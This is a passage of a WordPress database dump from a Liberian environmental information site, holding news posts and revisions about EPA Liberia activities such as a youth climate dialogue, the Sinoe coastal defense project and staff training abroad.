Yarkpawolo held a strategic engagement with FDA employees and park rangers, encouraging them to work collaboratively with the EPA and other relevant government agencies. He stressed that such partnerships are essential to achieving national goals for environmental sustainability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the discussion, the rangers shared their experiences dealing with illegal activities in the Sapo National Park, including illicit mining and hunting. They highlighted land degradation, water pollution, and the widespread threat of illegal mining as key environmental challenges endangering the park’s ecosystem.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In response to these alarming reports, Dr. Yarkpawolo extended his visit to the Sapo National Park for a fact-finding mission. Upon arrival, he met with the park\'s chief warden, John G. Smith, who provided detailed insights into the state of the park and the difficulties faced in protecting it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his commitment to transparency and evidence-based action, the EPA Executive Director proceeded with a team of FDA rangers to the Sapo Eco Lodge — an establishment operating near the park and often frequented by tourists.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, Dr. Yarkpawolo made a concerning observation: tourists were being transported to the park via canoe without life jackets, posing a serious safety risk. Further investigation revealed that the Sapo Eco Lodge had been operating without an environmental permit — a clear violation of national environmental laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Executive Director promptly informed the management of the lodge to begin the environmental permitting process without delay. He warned that failure to comply would result in penalties, including possible suspension or shutdown of operations.</p>\n<!-- /wp:paragraph -->','EPA Executive Director and Team Tours Sapo National Park, Cautions Eco Lodge on Permit Violation','','inherit','closed','closed','','5409-revision-v1','','','2025-05-12 15:40:39','2025-05-12 15:40:39','',5409,'https://ekmsliberia.info/?p=5411',0,'revision','',0),(5412,38,'2025-05-13 11:11:57','2025-05-13 11:11:57','<!-- wp:paragraph -->\n<p>The Executive Director of Liberian Youth for Climate Actions (LYCA) says young people must not just be invited to climate talks—they must be part of the decision-making. “When the climate changes, young people feel it most because floods destroy schools, heat affects our health, and bad roads and damaged farms make food scarce and expensive. If we don’t listen to young people now, we are failing our future,” Ezekiel Nyanfor said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He spoke at a three-day dialogue, to put youth, children, women, and people with disabilities at the center of Liberia’s Climate Plans, held from April 17 to 19, 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue, organized by the Environmental Protection Agency of Liberia (EPA) in partnership with UNDP, UNWomen, Medica Liberia, ActionAid Liberia, and other partners, aims to ensure that young people, women, people with disabilities, and children are not excluded from the country’s climate change plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nyanfor stressed that youth groups across Liberia are making an impact in protecting the environment. “We are not just asking to be heard; we are ready to lead. Give us the space, the tools, and the chance to act,” he intimated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reinforcing Nyanfor’s comments, Lydia Porkpah, also from the LCYA, said including marginalized groups in the NDC is not just for inclusion but for sustainability. “Young people are future leaders and change makers.; therefore, their perspectives and creative ideas are meaningful to the country\'s Nationally Determined Contributions (NDCs) decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue is part of efforts to develop Liberia’s third Nationally Determined Contribution (NDC 3.0) under the Paris Agreement. Under the NDCs, each country is required to reduce its greenhouse gas emissions and prepare for the effects of climate change. Liberia’s new plan aims to be more inclusive than ever before.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was an opportunity to raise awareness of Liberia’s NDC process and climate risks, identify youth, children, and gender-specific climate priorities, build participants\' capacities for climate advocacy, and develop a shared position paper reflecting recommendations for NDC 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We’ve made progress, but now we must go further,” said Mr. John Kannah, NDC\'s Focus person for Liberia. He explained that Liberia had already taken some steps under the last plan, but it wasn’t enough. “This dialogue provides an opportunity to hear from everyone, especially those whose voices were left out. The next plan must reflect the needs of women, children, youth, and people with disabilities who are often the first to suffer when climate disasters happen,” Kannah noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking for UN Women, National Feminist Economist John Smith strongly appealed for gender equality in climate policies. “Climate change does not affect everyone the same way. Women, especially those in rural communities, carry a heavy burden. They walk long distances for water, grow food from dry land, and care for children during climate emergencies. If we plan without them, we will fail,” Smith emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He continued, “Gender and youth-focused solutions are nice ideas, and the only way we can succeed. If we want a better tomorrow, we must ensure everyone is involved today,” Smith pointed out.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Banica S. Elliott, President of the Federation of Liberian Youth (FLY), delivered a passionate speech calling for more leadership opportunities for young people. “We don’t want to just sit at the table—we want to help shape the menu. Young people must be trusted to lead projects, design policies, and represent their communities. Climate change is our reality. Let us be part of the solution,” Elliot lamented.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She added that Liberia’s climate future will be stronger if the country invests in young people’s education, training, and innovation. “We are the engine of change. Give us fuel, and we will drive Liberia forward.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Laura Bee Kiekpo, Financial Secretary of the Women Empowerment Forum of Liberia under WONGOSOL, also spoke during the event. She reminded the audience of how women at the grassroots are often the first to respond to environmental problems in their communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“When floods come, it is women who protect the homes. When crops fail, it is women who find food. We know what our communities need, but we don’t always get the support or attention we deserve. This must change. Women’s groups must be supported and respected as leaders in climate actions,” said Kiekpo.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She called on the government and international partners to fund more local women-led projects and to give women the space to lead in decision-making rooms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Arthur R.M. Becker, Director of the Department of Multilateral Environmental Agreements at the EPA, said Liberia is ready to show the world that climate leadership must be inclusive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This event is more than just talking—it’s about making real change. Our country has signed international agreements, but we must also act at home. When we include everyone—youth, women, children, we build stronger, smarter, and fairer solutions,” Becker said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On behalf of UNDP, Abraham Tumbey said the dialogue was a powerful reminder that the voices of marginalized groups are essential to shaping the future of climate action in Liberia.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Your insights, energy, and commitment have enriched this dialogue and laid a strong foundation for inclusive and ambitious contributions to our Nationally Determined Contributions (NDCs). As we progress, let us ensure that the ideas shared are reflected in our policies, actions, and investments. Climate change affects us all, but when we act together, grounded in equity and driven by hope, we can turn this challenge into an opportunity for transformation,” Tumbey pleaded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The stakeholders participated in group discussions, panels, presentations, and training focusing on protecting children in climate disasters, supporting young people’s ideas, and ensuring women’s voices guide policies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ideas shared during the dialogue will directly shape the NDC 3.0 plan, which will be submitted later this year.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Officials from the Ministries of Gender, Children and Social Protection, Youth and Sports, and other government institutions exhibited a strong national support for inclusive efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I hope we can plait a new mat on the old one to consider what we did not achieve and see how realistic they are and the possibilities of achieving them. While we want to be ambitious, we must be realistic also,” said Curtis V. Dorley, Deputy Minister for Research, Policy and Planning, Ministry of Gender, Children and Social Protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The national dialogue marks an important moment in Liberia’s fight against climate change. It is a loud and clear statement that the country is ready to move forward, with everyone at the table, and no one is left behind.</p>\n<!-- /wp:paragraph -->','Young People Want Inclusion in Decisions on Climate Actions','','publish','open','open','','young-people-want-inclusion-in-decisions-on-climate-actions','','','2025-05-13 11:12:00','2025-05-13 11:12:00','',0,'https://ekmsliberia.info/?p=5412',66,'post','',0),(5413,38,'2025-05-13 11:10:22','2025-05-13 11:10:22','','Business Plan Competition - 16','Business Plan Competition - 16','inherit','open','closed','','business-plan-competition-16','','','2025-05-13 11:10:22','2025-05-13 11:10:22','',5412,'https://ekmsliberia.info/wp-content/uploads/2025/05/youth_dialogue.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES (5414,38,'2025-05-13 11:11:57','2025-05-13 11:11:57','<!-- wp:paragraph -->\n<p>The Executive Director of Liberian Youth for Climate Actions (LYCA) says young people must not just be invited to climate talks—they must be part of the decision-making. “When the climate changes, young people feel it most because floods destroy schools, heat affects our health, and bad roads and damaged farms make food scarce and expensive. If we don’t listen to young people now, we are failing our future,” Ezekiel Nyanfor said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He spoke at a three-day dialogue, to put youth, children, women, and people with disabilities at the center of Liberia’s Climate Plans, held from April 17 to 19, 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue, organized by the Environmental Protection Agency of Liberia (EPA) in partnership with UNDP, UNWomen, Medica Liberia, ActionAid Liberia, and other partners, aims to ensure that young people, women, people with disabilities, and children are not excluded from the country’s climate change plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nyanfor stressed that youth groups across Liberia are making an impact in protecting the environment. “We are not just asking to be heard; we are ready to lead. Give us the space, the tools, and the chance to act,” he intimated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reinforcing Nyanfor’s comments, Lydia Porkpah, also from the LCYA, said including marginalized groups in the NDC is not just for inclusion but for sustainability. “Young people are future leaders and change makers.; therefore, their perspectives and creative ideas are meaningful to the country\'s Nationally Determined Contributions (NDCs) decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue is part of efforts to develop Liberia’s third Nationally Determined Contribution (NDC 3.0) under the Paris Agreement. Under the NDCs, each country is required to reduce its greenhouse gas emissions and prepare for the effects of climate change. Liberia’s new plan aims to be more inclusive than ever before.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was an opportunity to raise awareness of Liberia’s NDC process and climate risks, identify youth, children, and gender-specific climate priorities, build participants\' capacities for climate advocacy, and develop a shared position paper reflecting recommendations for NDC 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We’ve made progress, but now we must go further,” said Mr. John Kannah, NDC\'s Focus person for Liberia. He explained that Liberia had already taken some steps under the last plan, but it wasn’t enough. “This dialogue provides an opportunity to hear from everyone, especially those whose voices were left out. The next plan must reflect the needs of women, children, youth, and people with disabilities who are often the first to suffer when climate disasters happen,” Kannah noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking for UN Women, National Feminist Economist John Smith strongly appealed for gender equality in climate policies. “Climate change does not affect everyone the same way. Women, especially those in rural communities, carry a heavy burden. They walk long distances for water, grow food from dry land, and care for children during climate emergencies. If we plan without them, we will fail,” Smith emphasized.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He continued, “Gender and youth-focused solutions are nice ideas, and the only way we can succeed. If we want a better tomorrow, we must ensure everyone is involved today,” Smith pointed out.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Banica S. Elliott, President of the Federation of Liberian Youth (FLY), delivered a passionate speech calling for more leadership opportunities for young people. “We don’t want to just sit at the table—we want to help shape the menu. Young people must be trusted to lead projects, design policies, and represent their communities. Climate change is our reality. Let us be part of the solution,” Elliot lamented.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She added that Liberia’s climate future will be stronger if the country invests in young people’s education, training, and innovation. “We are the engine of change. Give us fuel, and we will drive Liberia forward.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Laura Bee Kiekpo, Financial Secretary of the Women Empowerment Forum of Liberia under WONGOSOL, also spoke during the event. She reminded the audience of how women at the grassroots are often the first to respond to environmental problems in their communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“When floods come, it is women who protect the homes. When crops fail, it is women who find food. We know what our communities need, but we don’t always get the support or attention we deserve. This must change. Women’s groups must be supported and respected as leaders in climate actions,” said Kiekpo.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She called on the government and international partners to fund more local women-led projects and to give women the space to lead in decision-making rooms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Arthur R.M. Becker, Director of the Department of Multilateral Environmental Agreements at the EPA, said Liberia is ready to show the world that climate leadership must be inclusive.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This event is more than just talking—it’s about making real change. Our country has signed international agreements, but we must also act at home. When we include everyone—youth, women, children, we build stronger, smarter, and fairer solutions,” Becker said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On behalf of UNDP, Abraham Tumbey said the dialogue was a powerful reminder that the voices of marginalized groups are essential to shaping the future of climate action in Liberia.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Your insights, energy, and commitment have enriched this dialogue and laid a strong foundation for inclusive and ambitious contributions to our Nationally Determined Contributions (NDCs). As we progress, let us ensure that the ideas shared are reflected in our policies, actions, and investments. Climate change affects us all, but when we act together, grounded in equity and driven by hope, we can turn this challenge into an opportunity for transformation,” Tumbey pleaded.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The stakeholders participated in group discussions, panels, presentations, and training focusing on protecting children in climate disasters, supporting young people’s ideas, and ensuring women’s voices guide policies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ideas shared during the dialogue will directly shape the NDC 3.0 plan, which will be submitted later this year.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Officials from the Ministries of Gender, Children and Social Protection, Youth and Sports, and other government institutions exhibited a strong national support for inclusive efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I hope we can plait a new mat on the old one to consider what we did not achieve and see how realistic they are and the possibilities of achieving them. While we want to be ambitious, we must be realistic also,” said Curtis V. Dorley, Deputy Minister for Research, Policy and Planning, Ministry of Gender, Children and Social Protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The national dialogue marks an important moment in Liberia’s fight against climate change. It is a loud and clear statement that the country is ready to move forward, with everyone at the table, and no one is left behind.</p>\n<!-- /wp:paragraph -->','Young People Want Inclusion in Decisions on Climate Actions','','inherit','closed','closed','','5412-revision-v1','','','2025-05-13 11:11:57','2025-05-13 11:11:57','',5412,'https://ekmsliberia.info/?p=5414',0,'revision','',0),(5415,38,'2025-05-15 00:38:20','2025-05-15 00:38:20','<strong>Executive Summary</strong>\r\nThis Report is a consolidated summary of the 15 County Climate Change Baseline Reports prepared by experts under the bilateral support for the Nationally Determined Contributions (NDC) implementation and climate governance project initiated by the government of Liberia.\r\nThe 15 County Climate Change Baseline Reports present baseline for future climate actions in the 15 counties of Liberia. The reports draw on key insights to provide baseline for future policy developments that are unique to the each of the 15 Counties of Liberia. They provide the current climate change contexts at the county-level. The reports also emphasize the significance of understanding how climate change affects development and livelihood conditions at the grassroot level across the 15 political sub-divisions of Liberia. The reports offer a thorough and comprehensive assessment of the climate change situations in Liberia at the county-level.\r\n\r\nThey specifically examined the counties’ vulnerabilities to climate change, impacts of climate change in the various counties, the national climate policies, institutional frameworks governing the implementation of Liberia’s Nationally Determined Contributions (NDC) sector, and the challenges and opportunities for climate change adaptation and mitigation at the county-level.','Integrated Summary Report of Liberia 15 County Climate Change Baseline Reports','','publish','closed','closed','','integrated-summary-report-of-liberia-15-county-climate-change-baseline-reports','','','2025-05-15 00:38:20','2025-05-15 00:38:20','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5415',18,'document','',0),(5416,38,'2025-05-15 00:31:13','2025-05-15 00:31:13','','Cover Page','','inherit','open','closed','','cover-page','','','2025-05-15 00:31:13','2025-05-15 00:31:13','',5415,'https://ekmsliberia.info/wp-content/uploads/2025/05/Cover-Page.jpg',0,'attachment','image/jpeg',0),(5417,38,'2025-05-15 00:32:13','2025-05-15 00:32:13','','Consolidated Summary_Liberia_Climate_Change_Baseline_Reports-Final','','inherit','open','closed','','consolidated-summary_liberia_climate_change_baseline_reports-final','','','2025-05-15 00:32:13','2025-05-15 00:32:13','',5415,'https://ekmsliberia.info/wp-content/uploads/2025/05/Consolidated-Summary_Liberia_Climate_Change_Baseline_Reports-Final.pdf',0,'attachment','application/pdf',0),(5418,38,'2025-05-15 00:38:20','2025-05-15 00:38:20','<strong>Executive Summary</strong>\r\nThis Report is a consolidated summary of the 15 County Climate Change Baseline Reports prepared by experts under the bilateral support for the Nationally Determined Contributions (NDC) implementation and climate governance project initiated by the government of Liberia.\r\nThe 15 County Climate Change Baseline Reports present baseline for future climate actions in the 15 counties of Liberia. The reports draw on key insights to provide baseline for future policy developments that are unique to the each of the 15 Counties of Liberia. They provide the current climate change contexts at the county-level. The reports also emphasize the significance of understanding how climate change affects development and livelihood conditions at the grassroot level across the 15 political sub-divisions of Liberia. The reports offer a thorough and comprehensive assessment of the climate change situations in Liberia at the county-level.\r\n\r\nThey specifically examined the counties’ vulnerabilities to climate change, impacts of climate change in the various counties, the national climate policies, institutional frameworks governing the implementation of Liberia’s Nationally Determined Contributions (NDC) sector, and the challenges and opportunities for climate change adaptation and mitigation at the county-level.','Integrated Summary Report of Liberia 15 County Climate Change Baseline Reports','','inherit','closed','closed','','5415-revision-v1','','','2025-05-15 00:38:20','2025-05-15 00:38:20','',5415,'https://ekmsliberia.info/?p=5418',0,'revision','',0),(5420,38,'2025-05-20 19:46:22','2025-05-20 19:46:22','<!-- wp:paragraph -->\n<p>Greenville, Sinoe County, May 15, 2025 — The Government of Liberia, through the Environmental Protection Agency (EPA), has officially broken ground for a major coastal defense project in Greenville, Sinoe County, aimed at protecting the city from the devastating effects of sea erosion. The groundbreaking ceremony took place on Tuesday, March 13, 2025, at the Greenville Administrative Building.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative, known as the Sinoe County Coastal Defense Project, carries a total cost of $20.4 million USD. It is being funded through a partnership between the Global Environment Facility (GEF), the United Nations Development Programme (UNDP), and the Government of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the event, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo underscored the urgency of the project, noting that the advancing sea poses a serious threat to Greenville.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Greenville is being washed away by the sea,” Dr. Yarkpawolo warned. “This project will help protect lives, properties, and the future of this city.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the project includes the construction of a rock revetment along the shoreline, with the necessary rocks to be sourced from the nearby Bana community. Liberia’s contribution includes the provision of these rocks at no cost, while GEF and UNDP are committing approximately $9.1 million in direct funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":4438} -->\n<figure class=\"wp-block-image\"><img src=\"https://epa.gov.lr/wp-content/uploads/2025/05/42b2fa05-462e-4b19-9289-081cf907558d-1024x576.jpeg\" alt=\"\" class=\"wp-image-4438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo revealed that the project, while officially launched now, began technically in October 2022 and will run through August 2028. Foundational activities—such as environmental and social impact assessments, mapping of vulnerable zones, and contract signings—have already been completed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The required machinery has already arrived in the Bana community. Contracts for rock excavation and equipment rental have been signed. We’re on the move,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He emphasized that a Memorandum of Understanding with the Bana community ensures that at least 50% of the workers hired for the project will come from the local population—empowering the very people most affected.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he cautioned that while progress has been made, funding gaps remain. He disclosed that the initial project budget did not include compensation for the host community or local laborers. A request for $350,000 was submitted to the Ministry of Finance but was not approved.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We’re appealing to the lawmakers of Sinoe County to advocate for this in the next national budget review. If we don’t secure additional support, the project may suffer delays or even risk donor withdrawal,” Dr. Yarkpawolo warned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sinoe County Superintendent Peter Wleh Nyensuah welcomed the attendees and hailed the project as one of the most significant development undertakings for the county in recent history.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is a big achievement not only for the people of Greenville but for the entire Republic of Liberia. Sea erosion has robbed our people of land, livelihood, and peace of mind. This project restores hope,” he said. “The EPA, our international partners, and the people of Bana have shown what partnership can do. We must now rally our collective strength to see this through.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Superintendent Nyensuah also praised the community’s willingness to cooperate and encouraged transparency, collaboration, and local oversight to ensure smooth implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Sinoe County Senator Augistine S. Chea, who attended the event, reaffirmed the Legislature’s commitment to ensuring that the EPA receives the necessary support to close funding gaps.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The people of Bana deserve more than just gratitude—they deserve recognition and compensation for their role in safeguarding our coastal cities,” Senator Chea said. “The Sinoe Legislative Caucus will work with the EPA to ensure that the $350,000 requested is inserted in the upcoming national budget. This is not a favor—it’s a duty.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He emphasized that the government must take ownership of climate resilience initiatives, stating that this project must serve as a model for other counties.</p>\n<!-- /wp:paragraph -->','Government Breaks Ground for Coastal Defense Project in Sinoe to Curb Sea Erosion','','publish','open','open','','government-breaks-ground-for-coastal-defense-project-in-sinoe-to-curb-sea-erosion','','','2025-05-20 19:46:25','2025-05-20 19:46:25','',0,'https://ekmsliberia.info/?p=5420',65,'post','',0),(5421,38,'2025-05-19 13:07:59','2025-05-19 13:07:59','<strong>Background: </strong>\r\n\r\nThe Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians\' fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\n\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations Development Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the United Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed through a grant from GCF and co-finance from UNDP and GoL.\r\n\r\nThe core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment.','Consultancy notice for a National Civil or Construction Engineering Firm to Extend the Existing Nathaniel Varney Massaquoi Kindergarten, Elementary & Junior High School Building in West Point Township for the Establishment of an Education & Innovation Center','','publish','closed','closed','','consultancy-notice-for-a-national-civil-or-construction-engineering-firm-to-extend-the-existing-nathaniel-varney-massaquoi-kindergarten-elementary-junior-high-school-building-in-west-point-township','','','2025-05-19 14:07:20','2025-05-19 14:07:20','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5421',58,'ekms_bulletin','',0),(5422,38,'2025-05-19 13:07:21','2025-05-19 13:07:21','','TOR_EIC Renovation_MMCRP (Activity 3.1.1)_final_clean (1) (1)','','inherit','open','closed','','tor_eic-renovation_mmcrp-activity-3-1-1_final_clean-1-1','','','2025-05-19 13:07:21','2025-05-19 13:07:21','',5421,'https://ekmsliberia.info/wp-content/uploads/2025/05/TOR_EIC-Renovation_MMCRP-Activity-3.1.1_final_clean-1-1.pdf',0,'attachment','application/pdf',0),(5423,38,'2025-05-19 13:07:59','2025-05-19 13:07:59','<strong>Background: </strong>\r\n\r\nThe Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians\' fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\n\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations Development Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the United Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed through a grant from GCF and co-finance from UNDP and GoL.\r\n\r\nThe core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment.','Consultancy notice for a National Civil or Construction Engineering Firm to Extend the Existing Nathaniel Varney Massaquoi Kindergarten, Elementary & Junior High School Building in West Point Township for the Establishment of an Education & Innovation Center','','inherit','closed','closed','','5421-revision-v1','','','2025-05-19 13:07:59','2025-05-19 13:07:59','',5421,'https://ekmsliberia.info/?p=5423',0,'revision','',0),(5424,38,'2025-05-20 19:05:25','2025-05-20 19:05:25','<strong>Background: </strong>\n\nThe Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians\' fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\n\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks; the Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations Development Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP). The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the United Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed through a grant from GCF and co-finance from UNDP and GoL.\n\nThe core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment.','Consultancy notice for a National Civil or Construction Engineering Firm to Extend the Existing Nathaniel Varney Massaquoi Kindergarten, Elementary & Junior High School Building in West Point Township for the Establishment of an Education & Innovation Center','','inherit','closed','closed','','5421-autosave-v1','','','2025-05-20 19:05:25','2025-05-20 19:05:25','',5421,'https://ekmsliberia.info/?p=5424',0,'revision','',0),(5425,38,'2025-05-20 19:19:53','2025-05-20 19:19:53','<!-- wp:paragraph -->\n<p>Chiang Mai, Thailand – Two employees of the Environmental Protection Agency (EPA) of Liberia are currently participating in a major international training course on climate change in Thailand. The program, titled “Climate Change Mitigation &amp; Adaptation: Pathways for Sustainable Development,” brings together participants from around the world to explore practical solutions to the growing climate crisis.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberian representatives are Victoria Jones, Head Inspector for the EPA’s Compliance and Enforcement Department in Margibi County, and Timothy R. Yoko, Administrative Assistant and Chief of Office Staff to the Executive Director.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-week training, running from May 19 to 30, 2025, is being held at the Environmental Science Research Center, Faculty of Science, Chiang Mai University, in northern Thailand.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The course is designed to help developing countries like Liberia better understand and respond to climate change, especially through mitigation (reducing the causes of climate change) and adaptation (dealing with its current effects). It includes lectures, workshops, and field visits to successful Thai projects, such as smart farming systems and renewable energy models.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants are learning how to:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>Calculate greenhouse gas (GHG) emissions,</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Build local climate action plans,</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Design policies that fit their community needs.</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>On the final day, all trainees will present a draft adaptation policy based on what they’ve learned — a key step in bringing new ideas back to their home countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA says the training is vital for Liberia’s fight against climate change. As one of the countries most vulnerable to climate impacts like flooding, sea-level rise, and changing weather patterns, Liberia stands to benefit greatly from practical knowledge and international collaboration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With this training, Jones and Yoko are expected to help strengthen Liberia’s climate response and support the nation’s path toward sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>-30-</p>\n<!-- /wp:paragraph -->','Two EPA Liberia Employees Join Global Climate Change Training in Thailand','','publish','open','open','','two-epa-liberia-employees-join-global-climate-change-training-in-thailand','','','2025-05-20 19:19:54','2025-05-20 19:19:54','',0,'https://ekmsliberia.info/?p=5425',64,'post','',0),(5426,38,'2025-05-20 19:18:48','2025-05-20 19:18:48','','Ty','','inherit','open','closed','','ty','','','2025-05-20 19:18:48','2025-05-20 